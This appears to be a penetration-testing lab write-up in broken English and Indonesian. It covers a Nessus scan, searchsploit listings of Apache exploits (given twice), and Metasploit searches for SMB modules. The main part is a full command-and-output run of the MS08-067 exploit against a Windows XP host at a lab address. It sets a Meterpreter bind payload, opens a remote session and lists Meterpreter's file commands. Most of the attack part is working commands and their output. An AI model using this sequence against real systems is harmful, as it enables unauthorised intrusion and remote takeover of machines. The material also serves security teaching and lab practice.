exploit DB
The first-tam to know vurnerabilitie I use my application using the application Nessusd, which is a browser application that is able to see the gap in a system, as for some way to run this application is,
open your web browser, then enter the IP address vulnerabilitie will we know, in this Promised 127.0.0.1:8834, as for 8834 it is the port address for nessusd,
enter your username and password that was created then login
after that click scan, add
then enter the name on the column name and change the policy to be an internal IP maukkan netwotk scan and we will scan target.
After the scan click on the report and download the results of the scan before you scan
After the scan click on the report and download the results of the scan before you scan
after that, open the application exploitDB search,
After that, look at vulnerabilitie nessus scans have you had, then to look for services that could be a loophole to get into the system.
This time I look for the database from Apache
After that, look at vulnerabilitie nessus scans have you had, then to look for services that could be a loophole to get into the system.
This time I look for the database from Apache
root@bt:/pentest/exploits/exploitdb#
./searchsploit apache
Description
Path
---------------------------------------------------------------------------
-------------------------
Apache HTTP Server 2.x Memory Leak
Exploit /windows/dos/9.c
Apache <= 2.0.44 Linux Remote Denial
of Service Exploit /linux/dos/11.c
Webfroot Shoutbox < 2.32 (Apache)
Remote Exploit /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit
-Apache-Knacker.pl /linux/remote/38.pl
Apache 1.3.x mod_mylo Remote Code
Execution Exploit /multiple/remote/67.c
Apache mod_gzip (with debug_mode) <=
1.2.26.1a Remote Exploit /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote
Users Disclosure Exploit /linux/remote/132.c
Apache HTTPd Arbitrary Long HTTP
Headers DoS /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP
Headers DoS (c version) /linux/dos/371.c
htpasswd Apache 1.3.31 Local Exploit
/linux/local/466.pl
Apache <= 1.3.31 mod_include Local
Buffer Overflow Exploit /linux/local/587.c
Apache OpenSSL Remote Exploit (Multiple
Targets) (OpenFuckV2.c) /linux/remote/764.c
Apache <= 2.0.52 HTTP GET request
Denial of Service Exploit /multiple/dos/855.pl
Apache <= 2.0.49 Arbitrary Long HTTP
Headers Denial of Service /multiple/dos/1056.pl
Apache Tomcat < 5.5.17 Remote
Directory Listing Vulnerability
/multiple/remote/2061.txt
Apache < 1.3.37
/multiple/dos/2237.sh
Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI
TTY) Local Root Exploit /linux/local/3384.c
Apache Mod_Rewrite Off-by-one Remote
Overflow Exploit (win32) /windows/remote/3680.sh
Apache 2.0.58 mod_rewrite Remote
Overflow Exploit (win2k3) /windows/remote/3996.c
Apache mod_jk 1.2.19/1.2.20 Remote
Buffer Overflow Exploit /multiple/remote/4093.pl
Apache Tomcat Connector (mod_jk) Remote
Exploit (exec-shield) /linux/remote/4162.c
Apache Tomcat (webdav) Remote File
Disclosure Exploit /multiple/remote/4530.pl
Apache Tomcat (webdav) Remote File
Disclosure Exploit (ssl support) /linux/remote/4552.pl
mod_jk2 v2.0.2 for Apache 2.0 Remote
Buffer Overflow Exploit (win32) /windows/remote/5330.c
Apache Tomcat Connector jk2-2.0.2
(mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt
Bea Weblogic Apache Connector Code Exec
/ Denial of Service Exploit /windows/remote/6089.pl
Apache mod_jk 1.2.19 Remote Buffer
Overflow Exploit (win32) /windows/remote/6100.py
Apache Tomcat < 6.0.18 UTF8
Directory Traversal Vulnerability
/multiple/remote/6229.txt
Apache Tomcat
runtime.getRuntime().exec() Privilege Escalation (win)
/windows/local/7264.txt
Apache Geronimo <= 2.1.3 Multiple
Directory Traversal Vulnerabilities /multiple/remote/8458.txt
Apache mod_dav / svn Remote Denial of
Service Exploit /multiple/dos/8842.pl
Apache mod_perl 'Apache::Status' and
'Apache2::Status' Cross Site Scripting Vulnerability
/multiple/remote/9993.txt
Apache mod_perl 'Apache::Status' and
'Apache2::Status' Cross Site Scripting Vulnerability
/multiple/remote/9993.txt
Apache Tomcat Cookie Quote Handling
Remote Information Disclosure Vulnerability /multiple/remote/9994.txt
Apache Tomcat Form Authentication
Username Enumeration Weakness /multiple/remote/9995.txt
Apache Tomcat v3.2.1 404 Error Page
Cross Site Scripting Vulnerability /multiple/webapps/10292.txt
Joomla.Tutorials GHDB: Apache directory
listing Download Vulnerability /php/webapps/10811.txt
Apache 2.2.14 mod_isapi Dangling
Pointer Remote SYSTEM Exploit /windows/remote/11650.c
Apache Spamassassin Milter Plugin
Remote Root Command Execution /multiple/remote/11662.txt
Apache OFBiz SQL Remote Execution PoC
Payload /multiple/remote/12263.txt
Apache OFBiz FULLADMIN Creator PoC
Payload /multiple/remote/12264.txt
Multiple XSS in Apache OFBiz
/php/webapps/12330.txt
Apache Tomcat v. 5.5.0 to 5.5.29 &
6.0.0 to 6.0.26 information disclosure vulnerability
/multiple/remote/12343.txt
Authenticated Cross-Site Scripting
Vulnerability (XSS) within Apache Axis2 administration console
/multiple/webapps/12689.txt
Apache Axis2(1.4.1) Local File
Inclusion Vulnerability /php/webapps/12721.txt
Apache Tomcat < 6.0.18 UTF8
Directory Traversal Vulnerability /unix/remote/14489.c
Apache JackRabbit 2.0.0 webapp XPath
Injection /jsp/webapps/14617.txt
Apache 2.2 (Windows) Local Denial of
Service /windows/dos/15319.pl
Apache Archiva 1.0 - 1.3.1 CSRF
Vulnerability
/multiple/webapps/15710.txt
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache module mod_rewrite LDAP protocol
Buffer Overflow /windows/remote/16752.rb
Apache Win32 Chunked Encoding
/windows/remote/16782.rb
Apache mod_jk 1.2.20 Buffer Overflow
/windows/remote/16798.rb
Apache Struts < 2.2.0 Remote Command
Execution /multiple/remote/17691.rb
Apache httpd Remote Denial of Service
(memory exhaustion) /multiple/dos/17696.pl
Apache mod_proxy Reverse Proxy Exposure
Vulnerability PoC /multiple/remote/17969.py
Apache HTTP Server Denial of Service
/linux/dos/18221.c
Apache Struts2 <= 2.3.1 Multiple
Vulnerabilities
/multiple/webapps/18329.txt
find versi service in database apache to same vulner that existed at nessusd.
root@bt:/pentest/exploits/exploitdb#
./searchsploit apache
Description
Path
---------------------------------------------------------------------------
-------------------------
Apache HTTP Server 2.x Memory Leak
Exploit /windows/dos/9.c
Apache <= 2.0.44 Linux Remote Denial
of Service Exploit /linux/dos/11.c
Webfroot Shoutbox < 2.32 (Apache)
Remote Exploit /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit
-Apache-Knacker.pl /linux/remote/38.pl
Apache 1.3.x mod_mylo Remote Code
Execution Exploit /multiple/remote/67.c
Apache mod_gzip (with debug_mode) <=
1.2.26.1a Remote Exploit /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote
Users Disclosure Exploit /linux/remote/132.c
Apache HTTPd Arbitrary Long HTTP
Headers DoS /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP
Headers DoS (c version) /linux/dos/371.c
htpasswd Apache 1.3.31 Local Exploit
/linux/local/466.pl
Apache <= 1.3.31 mod_include Local
Buffer Overflow Exploit /linux/local/587.c
Apache OpenSSL Remote Exploit (Multiple
Targets) (OpenFuckV2.c) /linux/remote/764.c
Apache <= 2.0.52 HTTP GET request
Denial of Service Exploit /multiple/dos/855.pl
Apache <= 2.0.49 Arbitrary Long HTTP
Headers Denial of Service /multiple/dos/1056.pl
Apache Tomcat < 5.5.17 Remote
Directory Listing Vulnerability
/multiple/remote/2061.txt
Apache < 1.3.37
/multiple/dos/2237.sh
Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI
TTY) Local Root Exploit /linux/local/3384.c
Apache Mod_Rewrite Off-by-one Remote
Overflow Exploit (win32) /windows/remote/3680.sh
Apache 2.0.58 mod_rewrite Remote
Overflow Exploit (win2k3) /windows/remote/3996.c
Apache mod_jk 1.2.19/1.2.20 Remote
Buffer Overflow Exploit /multiple/remote/4093.pl
Apache Tomcat Connector (mod_jk) Remote
Exploit (exec-shield) /linux/remote/4162.c
Apache Tomcat (webdav) Remote File
Disclosure Exploit /multiple/remote/4530.pl
Apache Tomcat (webdav) Remote File
Disclosure Exploit (ssl support) /linux/remote/4552.pl
mod_jk2 v2.0.2 for Apache 2.0 Remote
Buffer Overflow Exploit (win32) /windows/remote/5330.c
Apache Tomcat Connector jk2-2.0.2
(mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt
Bea Weblogic Apache Connector Code Exec
/ Denial of Service Exploit /windows/remote/6089.pl
Apache mod_jk 1.2.19 Remote Buffer
Overflow Exploit (win32) /windows/remote/6100.py
Apache Tomcat < 6.0.18 UTF8
Directory Traversal Vulnerability
/multiple/remote/6229.txt
Apache Tomcat
runtime.getRuntime().exec() Privilege Escalation (win)
/windows/local/7264.txt
Apache Geronimo <= 2.1.3 Multiple
Directory Traversal Vulnerabilities /multiple/remote/8458.txt
Apache mod_dav / svn Remote Denial of
Service Exploit /multiple/dos/8842.pl
Apache mod_perl 'Apache::Status' and
'Apache2::Status' Cross Site Scripting Vulnerability
/multiple/remote/9993.txt
Apache mod_perl 'Apache::Status' and
'Apache2::Status' Cross Site Scripting Vulnerability
/multiple/remote/9993.txt
Apache Tomcat Cookie Quote Handling
Remote Information Disclosure Vulnerability /multiple/remote/9994.txt
Apache Tomcat Form Authentication
Username Enumeration Weakness /multiple/remote/9995.txt
Apache Tomcat v3.2.1 404 Error Page
Cross Site Scripting Vulnerability /multiple/webapps/10292.txt
Joomla.Tutorials GHDB: Apache directory
listing Download Vulnerability /php/webapps/10811.txt
Apache 2.2.14 mod_isapi Dangling
Pointer Remote SYSTEM Exploit /windows/remote/11650.c
Apache Spamassassin Milter Plugin
Remote Root Command Execution /multiple/remote/11662.txt
Apache OFBiz SQL Remote Execution PoC
Payload /multiple/remote/12263.txt
Apache OFBiz FULLADMIN Creator PoC
Payload /multiple/remote/12264.txt
Multiple XSS in Apache OFBiz
/php/webapps/12330.txt
Apache Tomcat v. 5.5.0 to 5.5.29 &
6.0.0 to 6.0.26 information disclosure vulnerability
/multiple/remote/12343.txt
Authenticated Cross-Site Scripting
Vulnerability (XSS) within Apache Axis2 administration console
/multiple/webapps/12689.txt
Apache Axis2(1.4.1) Local File
Inclusion Vulnerability /php/webapps/12721.txt
Apache Tomcat < 6.0.18 UTF8
Directory Traversal Vulnerability /unix/remote/14489.c
Apache JackRabbit 2.0.0 webapp XPath
Injection /jsp/webapps/14617.txt
Apache 2.2 (Windows) Local Denial of
Service /windows/dos/15319.pl
Apache Archiva 1.0 - 1.3.1 CSRF
Vulnerability
/multiple/webapps/15710.txt
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache Tomcat Manager Application
Deployer Authenticated Code Execution /multiple/remote/16317.rb
Apache module mod_rewrite LDAP protocol
Buffer Overflow /windows/remote/16752.rb
Apache Win32 Chunked Encoding
/windows/remote/16782.rb
Apache mod_jk 1.2.20 Buffer Overflow
/windows/remote/16798.rb
Apache Struts < 2.2.0 Remote Command
Execution /multiple/remote/17691.rb
Apache httpd Remote Denial of Service
(memory exhaustion) /multiple/dos/17696.pl
Apache mod_proxy Reverse Proxy Exposure
Vulnerability PoC /multiple/remote/17969.py
Apache HTTP Server Denial of Service
/linux/dos/18221.c
Apache Struts2 <= 2.3.1 Multiple
Vulnerabilities
/multiple/webapps/18329.txt
cari versi service pada database apache
yang sama dengan vulner yang ada pada nessusd.
Metasploit
to see service SMB
msf > search smb
Matching Modules
================
Name
Disclosure Date Rank Description
----
--------------- ---- -----------
auxiliary/admin/oracle/ora_ntlm_stealer
2009-04-07 normal Oracle SMB Relay Code Execution
auxiliary/admin/smb/check_dir_file
normal SMB Scanner Check
File/Directory Utility
auxiliary/admin/smb/samba_symlink_traversal
normal Samba Symlink Directory Traversal
auxiliary/admin/smb/upload_file
normal SMB File Upload
Utility
auxiliary/dos/windows/smb/ms05_047_pnp
normal Microsoft Plug and Play Service Registry Overflow
auxiliary/dos/windows/smb/ms06_035_mailslot
2006-07-11 normal Microsoft SRV.SYS Mailslot Write
Corruption
auxiliary/dos/windows/smb/ms06_063_trans
normal Microsoft SRV.SYS Pipe Transaction No Null
auxiliary/dos/windows/smb/ms09_001_write
normal Microsoft SRV.SYS WriteAndX Invalid DataOffset
auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
normal Microsoft SRV2.SYS SMB Negotiate ProcessID Function
Table Dereference
auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
normal Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL
Pointer Dereference
auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
normal Microsoft Windows 7 / Server 2008 R2 SMB Client
Infinite Loop
auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
normal Microsoft Windows SRV.SYS SrvSmbQueryFsInformation
Pool Overflow DoS
auxiliary/dos/windows/smb/ms11_019_electbowser
manual Microsoft Windows Browser Pool DoS
auxiliary/dos/windows/smb/rras_vls_null_deref
2006-06-14 normal Microsoft RRAS InterfaceAdjustVLSPointers
NULL Dereference
auxiliary/dos/windows/smb/vista_negotiate_stop
normal Microsoft Vista SP0 SMB Negotiate Protocol DoS
auxiliary/fuzzers/smb/smb2_negotiate_corrupt
normal SMB Negotiate SMB2 Dialect Corruption
auxiliary/fuzzers/smb/smb_create_pipe
normal SMB Create Pipe Request Fuzzer
auxiliary/fuzzers/smb/smb_create_pipe_corrupt
normal SMB Create Pipe Request Corruption
auxiliary/fuzzers/smb/smb_negotiate_corrupt
normal SMB Negotiate Dialect Corruption
auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
normal SMB NTLMv1 Login Request Corruption
auxiliary/fuzzers/smb/smb_tree_connect
normal SMB Tree Connect Request Fuzzer
auxiliary/fuzzers/smb/smb_tree_connect_corrupt
normal SMB Tree Connect Request Corruption
auxiliary/scanner/smb/pipe_auditor
normal SMB Session Pipe
Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor
normal SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2
normal SMB 2.0 Protocol
Detection
auxiliary/scanner/smb/smb_enumshares
normal SMB Share
Enumeration
auxiliary/scanner/smb/smb_enumusers
normal SMB User
Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain
normal SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login
normal SMB Login Check
Scanner
auxiliary/scanner/smb/smb_lookupsid
normal SMB Local User
Enumeration (LookupSid)
auxiliary/scanner/smb/smb_version
normal SMB Version
Detection
auxiliary/scanner/snmp/snmp_enumshares
normal SNMP Windows SMB Share Enumeration
auxiliary/server/capture/smb
normal Authentication
Capture: SMB
auxiliary/spoof/nbns/nbns_response
normal NetBIOS Name
Service Spoofer
exploit/linux/samba/chain_reply
2010-06-16 good Samba chain_reply
Memory Corruption (Linux x86)
exploit/netware/smb/lsass_cifs
2007-01-21 average Novell NetWare
LSASS CIFS.NLM Driver Stack Buffer Overflow
exploit/osx/browser/safari_file_policy
2011-10-12 normal Apple Safari file:// Arbitrary Code
Execution
exploit/windows/browser/java_ws_arginject_altjvm
2010-04-09 excellent Sun Java Web Start Plugin Command Line
Argument Injection
exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
2010-02-26 great Internet Explorer Winhlp32.exe MsgBox
Code Execution
exploit/windows/fileformat/ursoft_w32dasm
2005-01-24 good URSoft W32Dasm Disassembler Function
Buffer Overflow
exploit/windows/fileformat/vlc_smb_uri
2009-06-24 great VideoLAN Client (VLC) Win32 smb:// URI
Buffer Overflow
exploit/windows/oracle/extjob
2007-01-01 excellent Oracle Job
Scheduler Named Pipe Command Execution
exploit/windows/smb/ms03_049_netapi
2003-11-11 good Microsoft
Workstation Service NetAddAlternateComputerName Overflow
exploit/windows/smb/ms04_007_killbill
2004-02-10 low Microsoft ASN.1 Library Bitstring Heap
Overflow
exploit/windows/smb/ms04_011_lsass
2004-04-13 good Microsoft LSASS
Service DsRolerUpgradeDownlevelServer Overflow
exploit/windows/smb/ms04_031_netdde
2004-10-12 good Microsoft NetDDE
Service Overflow
exploit/windows/smb/ms05_039_pnp
2005-08-09 good Microsoft Plug and
Play Service Overflow
exploit/windows/smb/ms06_025_rasmans_reg
2006-06-13 good Microsoft RRAS Service RASMAN Registry
Overflow
exploit/windows/smb/ms06_025_rras
2006-06-13 average Microsoft RRAS
Service Overflow
exploit/windows/smb/ms06_040_netapi
2006-08-08 good Microsoft Server
Service NetpwPathCanonicalize Overflow
exploit/windows/smb/ms06_066_nwapi
2006-11-14 good Microsoft Services
MS06-066 nwapi32.dll
exploit/windows/smb/ms06_066_nwwks
2006-11-14 good Microsoft Services
MS06-066 nwwks.dll
exploit/windows/smb/ms06_070_wkssvc
2006-11-14 manual Microsoft
Workstation Service NetpManageIPCConnect Overflow
exploit/windows/smb/ms07_029_msdns_zonename
2007-04-12 manual Microsoft DNS RPC Service
extractQuotedChar() Overflow (SMB)
exploit/windows/smb/ms08_067_netapi
2008-10-28 great Microsoft Server
Service Relative Path Stack Corruption
exploit/windows/smb/ms09_050_smb2_negotiate_func_index
2009-09-07 good Microsoft SRV2.SYS SMB Negotiate
ProcessID Function Table Dereference
exploit/windows/smb/ms10_061_spoolss
2010-09-14 excellent Microsoft Print
Spooler Service Impersonation Vulnerability
exploit/windows/smb/netidentity_xtierrpcpipe
2009-04-06 great Novell NetIdentity Agent XTIERRPCPIPE
Named Pipe Buffer Overflow
exploit/windows/smb/psexec
1999-01-01 manual Microsoft Windows
Authenticated User Code Execution
exploit/windows/smb/smb_relay
2001-03-31 excellent Microsoft Windows
SMB Relay Code Execution
exploit/windows/smb/timbuktu_plughntcommand_bof
2009-06-25 great Timbuktu <= 8.6.6 PlughNTCommand Named
Pipe Buffer Overflow
post/windows/gather/enum_shares
normal Windows Gather SMB
Share Enumeration via Registry
too using service SMB for
eploitasion
msf > use
exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show
options
Module options
(exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required
Description
---- --------------- --------
-----------
RHOST yes
The target address
RPORT 445 yes
Set the SMB service port
SMBPIPE BROWSER yes
The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
too konfiguration IP target will be
exploitasion
msf exploit(ms08_067_netapi) > set
RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > show
options
Module options
(exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required
Description
---- --------------- --------
-----------
RHOST 192.168.56.101 yes
The target address
RPORT 445 yes
Set the SMB service port
SMBPIPE BROWSER yes
The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
too see payloads will be using
msf exploit(ms08_067_netapi) > show
payloads
Compatible Payloads
===================
Name
Disclosure Date Rank Description
----
--------------- ---- -----------
generic/custom
normal Custom Payload
generic/debug_trap
normal Generic x86 Debug Trap
generic/shell_bind_tcp
normal Generic Command Shell, Bind TCP
Inline
generic/shell_reverse_tcp
normal Generic Command Shell, Reverse
TCP Inline
generic/tight_loop
normal Generic x86 Tight Loop
windows/adduser
normal Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp
normal Reflective Dll Injection, Bind
TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp
normal Reflective Dll Injection, Bind
TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp
normal Reflective Dll Injection, Bind
TCP Stager
windows/dllinject/reverse_http
normal Reflective Dll Injection,
Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http
normal Reflective Dll Injection,
Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp
normal Reflective Dll Injection,
Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp
normal Reflective Dll Injection,
Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp
normal Reflective Dll Injection,
Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp
normal Reflective Dll Injection,
Reverse TCP Stager
windows/dllinject/reverse_tcp_allports
normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns
normal Reflective Dll Injection,
Reverse TCP Stager (DNS)
windows/download_exec
normal Windows Executable Download and
Execute
windows/exec
normal Windows Execute Command
windows/loadlibrary
normal Windows LoadLibrary Path
windows/messagebox
normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager
windows/meterpreter/reverse_http
normal Windows Meterpreter (Reflective
Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https
normal Windows Meterpreter (Reflective
Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http
normal Windows Meterpreter (Reflective Injection), Reverse HTTP
Stager (IPv6)
windows/meterpreter/reverse_ipv6_https
normal Windows Meterpreter (Reflective Injection), Reverse HTTPS
Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports
normal Windows Meterpreter (Reflective Injection), Reverse All-Port
TCP Stager
windows/meterpreter/reverse_tcp_dns
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp
normal Windows Meterpreter Service,
Bind TCP
windows/metsvc_reverse_tcp
normal Windows Meterpreter Service,
Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp
normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp
normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp
normal Windows Inject DLL, Bind TCP
Stager
windows/patchupdllinject/reverse_ipv6_tcp
normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp
normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp
normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or
Win7)
windows/patchupdllinject/reverse_tcp
normal Windows Inject DLL, Reverse TCP
Stager
windows/patchupdllinject/reverse_tcp_allports
normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns
normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp
normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
(IPv6)
windows/patchupmeterpreter/bind_nonx_tcp
normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No
NX or Win7)
windows/patchupmeterpreter/bind_tcp
normal Windows Meterpreter (skape/jt
injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp
normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP
Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports
normal Windows Meterpreter (skape/jt injection), Reverse All-Port
TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(DNS)
windows/shell/bind_ipv6_tcp
normal Windows Command Shell, Bind TCP
Stager (IPv6)
windows/shell/bind_nonx_tcp
normal Windows Command Shell, Bind TCP
Stager (No NX or Win7)
windows/shell/bind_tcp
normal Windows Command Shell, Bind TCP
Stager
windows/shell/reverse_http
normal Windows Command Shell, Reverse
HTTP Stager
windows/shell/reverse_ipv6_http
normal Windows Command Shell, Reverse
HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp
normal Windows Command Shell, Reverse
TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp
normal Windows Command Shell, Reverse
TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp
normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp
normal Windows Command Shell, Reverse
TCP Stager
windows/shell/reverse_tcp_allports
normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell/reverse_tcp_dns
normal Windows Command Shell, Reverse
TCP Stager (DNS)
windows/shell_bind_tcp
normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp
normal Windows Command Shell, Reverse
TCP Inline
windows/speak_pwned
normal Windows Speech API - Say "You
Got Pwned!"
windows/upexec/bind_ipv6_tcp
normal Windows Upload/Execute, Bind TCP
Stager (IPv6)
windows/upexec/bind_nonx_tcp
normal Windows Upload/Execute, Bind TCP
Stager (No NX or Win7)
windows/upexec/bind_tcp
normal Windows Upload/Execute, Bind TCP
Stager
windows/upexec/reverse_http
normal Windows Upload/Execute, Reverse
HTTP Stager
windows/upexec/reverse_ipv6_http
normal Windows Upload/Execute, Reverse
HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp
normal Windows Upload/Execute, Reverse
TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp
normal Windows Upload/Execute, Reverse
TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp
normal Windows Upload/Execute, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp
normal Windows Upload/Execute, Reverse
TCP Stager
windows/upexec/reverse_tcp_allports
normal Windows Upload/Execute, Reverse
All-Port TCP Stager
windows/upexec/reverse_tcp_dns
normal Windows Upload/Execute, Reverse
TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager
windows/vncinject/reverse_http
normal VNC Server (Reflective
Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http
normal VNC Server (Reflective
Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp
normal VNC Server (Reflective
Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports
normal VNC Server (Reflective Injection), Reverse All-Port TCP
Stager
windows/vncinject/reverse_tcp_dns
normal VNC Server (Reflective
Injection), Reverse TCP Stager (DNS)
too using payload in exploitasi
msf exploit(ms08_067_netapi) > set
payloads
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If
value is omitted, print the current value.
If both are omitted, print options that
are currently set.
If run from a module context, this will
set the value in the module's
datastore. Use -g to operate on the
global datastore
msf exploit(ms08_067_netapi) > set
payload windows/meterpreter/bind_tcp
payload =>
windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) >
check
[*] Verifying vulnerable status...
(path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) >
exploit
[*] Started bind handler
[*] Automatically detecting the
target...
[*] Fingerprint: Windows XP - Service
Pack 3 - lang:English
[*] Selected Target: Windows XP SP3
English (AlwaysOn NX)
[*] Attempting to trigger the
vulnerability...
[*] Sending stage (752128 bytes) to
192.168.56.101
[*] Meterpreter session 1 opened
(192.168.56.1:40021 -> 192.168.56.101:4444) at 2012-01-28 03:13:59
+0700
too see commad in meterpreter
meterpreter > help
Core Commands
=============
Command
Description
-------
-----------
? Help menu
background
Backgrounds the current session
bgkill Kills a
background meterpreter script
bglist Lists
running background scripts
bgrun Executes
a meterpreter script as a background thread
channel Displays
information about active channels
close Closes a
channel
detach Detach
the meterpreter session (for http/https)
disable_unicode_encoding Disables
encoding of unicode strings
enable_unicode_encoding Enables
encoding of unicode strings
exit Terminate
the meterpreter session
help Help menu
info Displays
information about a Post module
interact Interacts
with a channel
irb Drop into
irb scripting mode
load Load one
or more meterpreter extensions
migrate Migrate
the server to another process
quit Terminate
the meterpreter session
read Reads
data from a channel
resource Run the
commands stored in a file
run Executes
a meterpreter script or Post module
use
Deprecated alias for 'load'
write Writes
data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of
a file to the screen
cd Change directory
del Delete the specified
file
download Download a file or
directory
edit Edit a file
